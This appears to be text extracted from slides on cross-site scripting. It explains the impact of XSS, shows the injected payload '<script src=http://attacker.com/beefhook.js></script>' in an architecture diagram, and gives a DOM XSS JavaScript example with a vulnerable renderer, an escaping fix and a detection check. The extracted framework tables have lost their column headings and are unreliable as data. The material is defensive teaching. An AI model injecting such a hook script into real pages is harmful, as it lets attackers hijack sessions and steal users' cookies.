When an attacker gets a user's browser to execute their code, that code runs
within the security context (or zone) of the hosting web site. With this level of
privilege, the code can read, modify and transmit any sensitive data
accessible to the browser for that site. A user hit by cross-site scripting could have their
account hijacked (cookie theft), their browser redirected to another location, or
be shown fraudulent content that appears to be delivered by the web site they are visiting.
An attacker can use XSS to send a malicious script to an unsuspecting user. The
end user's browser has no way to know that the script should not be trusted,
and will execute it. Because the browser thinks the script came from a trusted
source, the malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
[Architecture diagram, repeated over several animation frames: FRONTEND, SERVICE GATEWAY, CRM, CART, PAYMENTS, ANALYTICS and MESSAGE QUEUE, with HACKERS and USERS outside the application boundary. The injected payload shown in the diagram is: <script src=http://attacker.com/beefhook.js></script>]
APIs everywhere
DOM XSS - a form of XSS where the entire tainted data flow from
source to sink takes place in the browser.
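As an added example (not code from the original slides), the DOM XSS flow just described, written in JavaScript: an attacker-controlled source (the URL fragment) reaches an HTML sink without ever touching the server, and the vulnerable rendering is shown beside a hardened one. The function names, the `#name=` parameter and the payload are constructed for this example; the payload mirrors the one shown in the slides.

```javascript
// Added example: DOM XSS taint flow from source to sink, and its mitigation.
// Constructed payload, modelled on the script tag shown in the slides.
const ATTACKER_PAYLOAD = '<script src=http://attacker.com/beefhook.js></script>';

// Source: the URL fragment. It is fully under the visitor's (or a phisher's)
// control and is never sent to the server, so server-side filters never see it.
function readNameFromFragment(href) {
  const idx = href.indexOf('#name=');
  return idx === -1 ? 'guest' : decodeURIComponent(href.slice(idx + 6));
}

// Vulnerable: untrusted text is concatenated straight into markup. Assigned to
// innerHTML or passed to document.write, the browser parses it as HTML and the
// attacker's script executes in the site's own origin.
function renderUnsafe(name) {
  return '<p>Welcome, ' + name + '</p>';
}

// Hardened: encode the HTML-significant characters before the data reaches an
// HTML-body sink, so the payload is displayed as text instead of being parsed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderSafe(name) {
  return '<p>Welcome, ' + escapeHtml(name) + '</p>';
}

// Detection helper: true when the produced markup still contains a script element.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// In a real page the sink would be something like
//   document.getElementById('out').innerHTML = renderSafe(name);
// Better still is a sink that never parses markup at all: textContent.
if (typeof document !== 'undefined') {
  const name = readNameFromFragment(location.href);
  document.getElementById('out').textContent = 'Welcome, ' + name;
}
```

Note that escaping is context-specific: the escaper above is correct for the HTML body, but data placed inside an attribute, a JavaScript string or a URL needs the encoding for that context, which is what the per-framework table below is about.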
JavaEE       N N N N N N
Thymeleaf    Y Y N N N N
ERB          Y Y N N N N
Razor        Y Y N Y Y N
AngularJS    Y Y Y Y Y N
ReactJS      Y Y Y Y Y N
GO Template  Y Y Y Y Y Y
Affected by scale
Affected by complexity
View
UserPortal      N N N N N N
Administration  Y Y N N N N
Data Import     Y Y N N N N
                Y Y N Y Y N
                Y Y Y Y Y N
                Y Y Y Y Y N
                Y Y Y Y Y Y
https://www.whitehatsec.com/blog/